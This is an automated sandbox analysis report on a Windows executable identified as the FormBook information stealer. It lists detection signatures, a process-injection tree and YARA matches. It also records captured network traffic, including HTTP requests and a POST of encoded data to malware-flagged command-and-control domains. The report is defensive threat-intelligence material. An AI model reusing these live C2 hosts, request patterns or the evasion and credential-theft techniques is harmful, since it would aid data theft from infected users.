Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
gbdXRnNKkm.exe

Overview

General Information

Sample name:gbdXRnNKkm.exe
renamed because original name is a hash value
Original sample name:6e36668b3ffe968a9e26a5a6aafa6f06b406391790924b33d8de05165d7e2a38.exe
Analysis ID:1634607
MD5:bf0acf0a5729840e61dd1f08fc84257d
SHA1:077f71cad1bc3ae9ada3ffc8eb50e051da794087
SHA256:6e36668b3ffe968a9e26a5a6aafa6f06b406391790924b33d8de05165d7e2a38
Tags:exeFormbookuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Yara detected FormBook
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • gbdXRnNKkm.exe (PID: 5800 cmdline: "C:\Users\user\Desktop\gbdXRnNKkm.exe" MD5: BF0ACF0A5729840E61DD1F08FC84257D)
    • svchost.exe (PID: 4632 cmdline: "C:\Users\user\Desktop\gbdXRnNKkm.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • D3y5b0UXPl.exe (PID: 1632 cmdline: "C:\Program Files (x86)\VzrnEAoXtUqiOwcHSYXSmzjCULfPgInsNNMagKLOQXaQyxGaHUvh\etZINwhZjPmXW.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
        • takeown.exe (PID: 7648 cmdline: "C:\Windows\SysWOW64\takeown.exe" MD5: A9AB2877AE82A53F5A387B045BF326A4)
          • firefox.exe (PID: 7852 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000003.00000002.1412763215.0000000002FB0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000A.00000002.3660621967.0000000003170000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000A.00000002.3660737432.00000000032E0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000003.00000002.1414559541.0000000004C00000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000009.00000002.3660890231.00000000038C0000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries
            SourceRuleDescriptionAuthorStrings
            3.2.svchost.exe.4f0000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              3.2.svchost.exe.4f0000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\gbdXRnNKkm.exe", CommandLine: "C:\Users\user\Desktop\gbdXRnNKkm.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\gbdXRnNKkm.exe", ParentImage: C:\Users\user\Desktop\gbdXRnNKkm.exe, ParentProcessId: 5800, ParentProcessName: gbdXRnNKkm.exe, ProcessCommandLine: "C:\Users\user\Desktop\gbdXRnNKkm.exe", ProcessId: 4632, ProcessName: svchost.exe
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\gbdXRnNKkm.exe", CommandLine: "C:\Users\user\Desktop\gbdXRnNKkm.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\gbdXRnNKkm.exe", ParentImage: C:\Users\user\Desktop\gbdXRnNKkm.exe, ParentProcessId: 5800, ParentProcessName: gbdXRnNKkm.exe, ProcessCommandLine: "C:\Users\user\Desktop\gbdXRnNKkm.exe", ProcessId: 4632, ProcessName: svchost.exe
                No Suricata rule has matched

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: gbdXRnNKkm.exeAvira: detected
                Source: http://www.nan21.net/qgyh/Avira URL Cloud: Label: malware
                Source: http://www.nan21.net/qgyh/?ERz=N2HmuFTIqRTXb4KETJj8CE9599F//QagMURGDfaeIcB+VU8vulHmTvOSs8UDoR9HksVnHqxRO+DaBCTDBDB84DrGlrLbfAup4LskVHxAz2aVoJcIctBHkC743fNM4m+H2KSbQJE=&fLuX=88EDQdk8JVL4MXAvira URL Cloud: Label: malware
                Source: http://www.multo.xyz/7pb3/Avira URL Cloud: Label: malware
                Source: http://www.multo.xyz/7pb3/?fLuX=88EDQdk8JVL4MX&ERz=iG3q5PwMXeyF6Z6OHOwnLDAB2x86IZiFZMnOHUGgWgCa6YvXG8DQKYCG1+TzSzVVi72rS31ZgGUBbEqi37d3liyshf+awvumd8QMl+tW3OgygeOmbI1Z2eSrbRuDAHzm0lVjKsQ=Avira URL Cloud: Label: malware
                Source: gbdXRnNKkm.exeReversingLabs: Detection: 71%
                Source: gbdXRnNKkm.exeVirustotal: Detection: 73%Perma Link
                Source: Yara matchFile source: 3.2.svchost.exe.4f0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.svchost.exe.4f0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.1412763215.0000000002FB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3660621967.0000000003170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3660737432.00000000032E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1414559541.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3660890231.00000000038C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.3658971513.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1412334229.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3667213701.0000000008450000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: gbdXRnNKkm.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: takeown.pdbGCTL source: svchost.exe, 00000003.00000003.1380325683.0000000002A1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1380395659.0000000002A26000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1380378747.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, D3y5b0UXPl.exe, 00000009.00000003.1489112387.0000000000869000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: gbdXRnNKkm.exe, 00000000.00000003.1225085870.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, gbdXRnNKkm.exe, 00000000.00000003.1227259521.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1412808640.000000000329E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1412808640.0000000003100000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1316834190.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1318497401.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000A.00000003.1412527420.00000000031E6000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000A.00000003.1418995866.0000000003397000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000A.00000002.3660913477.0000000003540000.00000040.00001000.00020000.00000000.sdmp, takeown.exe, 0000000A.00000002.3660913477.00000000036DE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: takeown.pdb source: svchost.exe, 00000003.00000003.1380325683.0000000002A1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1380395659.0000000002A26000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1380378747.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, D3y5b0UXPl.exe, 00000009.00000003.1489112387.0000000000869000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: gbdXRnNKkm.exe, 00000000.00000003.1225085870.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, gbdXRnNKkm.exe, 00000000.00000003.1227259521.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000003.00000002.1412808640.000000000329E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1412808640.0000000003100000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1316834190.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.1318497401.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, takeown.exe, 0000000A.00000003.1412527420.00000000031E6000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000A.00000003.1418995866.0000000003397000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000A.00000002.3660913477.0000000003540000.00000040.00001000.00020000.00000000.sdmp, takeown.exe, 0000000A.00000002.3660913477.00000000036DE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: D3y5b0UXPl.exe, 00000009.00000002.3665968001.000000000601C000.00000004.80000000.00040000.00000000.sdmp, takeown.exe, 0000000A.00000002.3659176995.0000000002E8E000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000A.00000002.3661272291.0000000003B6C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1701587870.000000002D27C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: D3y5b0UXPl.exe, 00000009.00000002.3665968001.000000000601C000.00000004.80000000.00040000.00000000.sdmp, takeown.exe, 0000000A.00000002.3659176995.0000000002E8E000.00000004.00000020.00020000.00000000.sdmp, takeown.exe, 0000000A.00000002.3661272291.0000000003B6C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1701587870.000000002D27C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: D3y5b0UXPl.exe, 00000009.00000000.1333349591.00000000006DF000.00000002.00000001.01000000.00000008.sdmp
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B6445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_00B6445A
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B6C6D1 FindFirstFileW,FindClose,0_2_00B6C6D1
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B6C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00B6C75C
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B6EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00B6EF95
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B6F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00B6F0F2
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B6F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00B6F3F3
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00B637EF
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B63B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00B63B12
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B6BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00B6BCBC
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 10_2_02E1C380 FindFirstFileW,FindNextFileW,FindClose,10_2_02E1C380
                Source: C:\Program Files (x86)\VzrnEAoXtUqiOwcHSYXSmzjCULfPgInsNNMagKLOQXaQyxGaHUvh\D3y5b0UXPl.exeCode function: 4x nop then pop edi9_2_084735E7
                Source: C:\Program Files (x86)\VzrnEAoXtUqiOwcHSYXSmzjCULfPgInsNNMagKLOQXaQyxGaHUvh\D3y5b0UXPl.exeCode function: 4x nop then pop edi9_2_08475643
                Source: C:\Program Files (x86)\VzrnEAoXtUqiOwcHSYXSmzjCULfPgInsNNMagKLOQXaQyxGaHUvh\D3y5b0UXPl.exeCode function: 4x nop then xor eax, eax9_2_08478E28
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 4x nop then xor eax, eax10_2_02E09DD0
                Source: C:\Windows\SysWOW64\takeown.exeCode function: 4x nop then mov ebx, 00000004h10_2_033E04F8

                Networking

                barindex
                Source: DNS query: www.sislieskort.xyz
                Source: DNS query: www.dolfisstillspinnin.xyz
                Source: DNS query: www.multo.xyz
                Source: Joe Sandbox ViewIP Address: 104.21.112.1 104.21.112.1
                Source: Joe Sandbox ViewIP Address: 104.21.112.1 104.21.112.1
                Source: Joe Sandbox ViewIP Address: 3.75.10.80 3.75.10.80
                Source: Joe Sandbox ViewIP Address: 3.75.10.80 3.75.10.80
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\gbdXRnNKkm.exeCode function: 0_2_00B722EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00B722EE
                Source: global trafficHTTP traffic detected: GET /glm7/?ERz=c3cNohkT5nIdW2eyEx8s7+0O2NNiR/tgpQEW4SezL5ftNCrKyIMnC5N2KYOJPpUbAjTm2X+3v3M3VE72mVE/plipaGNkddb2jL7OOh+v7t/x7/AnjOGKvUlOuL//r1u6EjU+kfE=&fLuX=88EDQdk8JVL4MX HTTP/1.1Host: www.sislieskort.xyzAccept: */*Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S5310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /qgyh/?ERz=N2HmuFTIqRTXb4KETJj8CE9599F//QagMURGDfaeIcB+VU8vulHmTvOSs8UDoR9HksVnHqxRO+DaBCTDBDB84DrGlrLbfAup4LskVHxAz2aVoJcIctBHkC743fNM4m+H2KSbQJE=&fLuX=88EDQdk8JVL4MX HTTP/1.1Host: www.nan21.netAccept: */*Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S5310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /a669/?ERz=rwARXV5iz9NY7lD2nse3mpYvX8mI8lq4kwoE5vm7VO31wBaqesAJuHozl9YZ6Ede+IkifZaE/LHkIUXetab9rl00CglX2pKv9YN8iuRxzTdWq+TltZu1Ts2jDMPEAv0cwfEHjzs=&fLuX=88EDQdk8JVL4MX HTTP/1.1Host: www.rbopisalive.cyouAccept: */*Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S5310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /z4h6/?ERz=oPD5yFZP7wctr4H+UTXo8U1sQMLypPPPi/lke/3f4LEIiJw/NGa43dXYK61sC1fT5ul8W7mIEEjnBlsOqjdznuc7OkkqT82yW4fryMVKvxAGocvAG+dLnJThS/BrQn1Mm9ja8Ac=&fLuX=88EDQdk8JVL4MX HTTP/1.1Host: www.dolfisstillspinnin.xyzAccept: */*Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S5310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /7pb3/?fLuX=88EDQdk8JVL4MX&ERz=iG3q5PwMXeyF6Z6OHOwnLDAB2x86IZiFZMnOHUGgWgCa6YvXG8DQKYCG1+TzSzVVi72rS31ZgGUBbEqi37d3liyshf+awvumd8QMl+tW3OgygeOmbI1Z2eSrbRuDAHzm0lVjKsQ= HTTP/1.1Host: www.multo.xyzAccept: */*Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S5310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /6sso/?ERz=5FYyPsJYL9mEwCZYVUnKPFrY8+hnQKVbJI6dHZrolSWgUyhhuZcUC37k5jyocUOOYHYjhpJnfRuNQT4n0jS+7Ytkj8ml9DFWF/GwfVm9hYeou/wyAin0yEy/IsOshtUp3mHulok=&fLuX=88EDQdk8JVL4MX HTTP/1.1Host: www.zenilow.siteAccept: */*Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S5310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: www.sislieskort.xyz
                Source: global trafficDNS traffic detected: DNS query: www.nan21.net
                Source: global trafficDNS traffic detected: DNS query: www.rbopisalive.cyou
                Source: global trafficDNS traffic detected: DNS query: www.dolfisstillspinnin.xyz
                Source: global trafficDNS traffic detected: DNS query: www.multo.xyz
                Source: global trafficDNS traffic detected: DNS query: www.zenilow.site
                Source: global trafficDNS traffic detected: DNS query: www.kakeksakti43.cfd
                Source: unknownHTTP traffic detected: POST /qgyh/ HTTP/1.1Host: www.nan21.netAccept: */*Accept-Language: en-USAccept-Encoding: gzip, deflate, brOrigin: http://www.nan21.netCache-Control: max-age=0Content-Length: 208Content-Type: application/x-www-form-urlencodedConnection: closeReferer: http://www.nan21.net/qgyh/User-Agent: Mozilla/5.0 (Linux; Android 4.1.2; GT-S5310 Build/JZO54K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36Data Raw: 45 52 7a 3d 41 30 76 47 74 77 2f 57 6b 57 37 4f 58 74 79 38 63 62 2f 47 61 56 51 6a 6a 63 35 54 6f 69 43 49 4a 77 63 7a 44 4e 4c 6c 49 62 4e 4b 66 41 49 4c 68 6b 4c 30 43 76 65 54 68 74 5a 71 6f 43 56 65 74 4f 39 4f 54 5a 59 49 66 61 4b 78 56 54 2f 53 54 68 64 49 75 47 44 33 72 64 37 49 42 54 66 50 77 62 6f 52 42 58 4d 50 2f 58 4b 31 71 36 70 51 5a 59 4d 72 6d 79 33 6c 34 39 74 38 32 32 6d 45 75 5a 43 57 61 4a 77 65 6a 59 43 45 2b 63 59 46 52 4d 72 59 4b 68 52 52 78 39 47 7a 6a 50 59 63 44 64 38 61 58 36 55 67 61 46 39 71 4a 5a 4d 73 46 43 61 79 6d 71 6b 4a 42 74 38 4f 2f 47 69 37 71 51 63 46 61 70 51 74 74 59 43 32 Data Ascii: ERz=A0vGtw/WkW7OXty8cb/GaVQjjc5ToiCIJwczDNLlIbNKfAILhkL0CveThtZqoCVetO9OTZYIfaKxVT/SThdIuGD3rd7IBTfPwboRBXMP/XK1q6pQZYMrmy3l49t822mEuZCWaJwejYCE+cYFRMrYKhRRx9GzjPYcDd8aX6UgaF9qJZMsFCaymqkJBt8O/Gi7qQcFapQttYC2
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: private, max-age=0Content-Type: text/plain; charset=utf-8Date: Tue, 11 Mar 2025 01:14:47 GMTServer: NetlifyX-Nf-Request-Id: 01JP1C9G9M2S48PVNY3C4PYY67Content-Length: 50Connection: closeData Raw: 4e 6f 74 20 46 6f 75 6e 64 20 2d 20 52 65 71 75 65 73 74 20 49 44 3a 20 30 31 4a 50 31 43 39 47 39 4d 32 53 34 38 50 56 4e 59 33 43 34 50 59 59 36 37 Data Ascii: Not Found - Request ID: 01JP1C9G9M2S48PVNY3C4PYY67
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: private, max-age=0Content-Type: text/plain; charset=utf-8Date: Tue, 11 Mar 2025 01:14:50 GMTServer: NetlifyX-Nf-Request-Id: 01JP1C9JWCNYPPBWMA0544WVHKContent-Length: 50Connection: closeData Raw: 4e 6f 74 20 46 6f 75 6e 64 20 2d 20 52 65 71 75 65 73 74 20 49 44 3a 20 30 31 4a 50 31 43 39 4a 57 43 4e 59 50 50 42 57 4d 41 30 35 34 34 57 56 48 4b Data Ascii: Not Found - Request ID: 01JP1C9JWCNYPPBWMA0544WVHK
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: private, max-age=0Content-Type: text/plain; charset=utf-8Date: Tue, 11 Mar 2025 01:14:52 GMTServer: NetlifyX-Nf-Request-Id: 01JP1C9NDF56TCJY1A1C62ZFDHContent-Length: 50Connection: closeData Raw: 4e 6f 74 20 46 6f 75 6e 64 20 2d 20 52 65 71 75 65 73 74 20 49 44 3a 20 30 31 4a 50 31 43 39 4e 44 46 35 36 54 43 4a 59 31 41 31 43 36 32 5a 46 44 48 Data Ascii: Not Found - Request ID: 01JP1C9NDF56TCJY1A1C62ZFDH
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: private, max-age=0Content-Type: text/plain; charset=utf-8Date: Tue, 11 Mar 2025 01:14:55 GMTServer: NetlifyX-Nf-Request-Id: 01JP1C9QWP95FMQ8HDA9AKQB33Content-Length: 50Connection: closeData Raw: 4e 6f 74 20 46 6f 75 6e 64 20 2d 20 52 65 71 75 65 73 74 20 49 44 3a 20 30 31 4a 50 31 43 39 51 57 50 39 35 46 4d 51 38 48 44 41 39 41 4b 51 42 33 33 Data Ascii: Not Found - Request ID: 01JP1C9QWP95FMQ8HDA9AKQB33
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Mar 2025 01:15:14 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
